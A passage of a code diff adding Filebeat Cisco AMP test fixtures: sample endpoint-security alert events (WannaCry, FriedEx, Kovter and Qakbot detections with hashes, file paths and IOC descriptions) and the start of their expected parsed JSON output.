Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json new file mode 100644 index 000000000000..b1d52f25c8a8 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json @@ -0,0 +1,2349 @@ +[ + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867970", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204901661835279", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 459000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 1186, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204901661835278", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 443000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 2465, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204901661835276", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 69000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 3738, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204897366867979", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 6000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 5108, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + 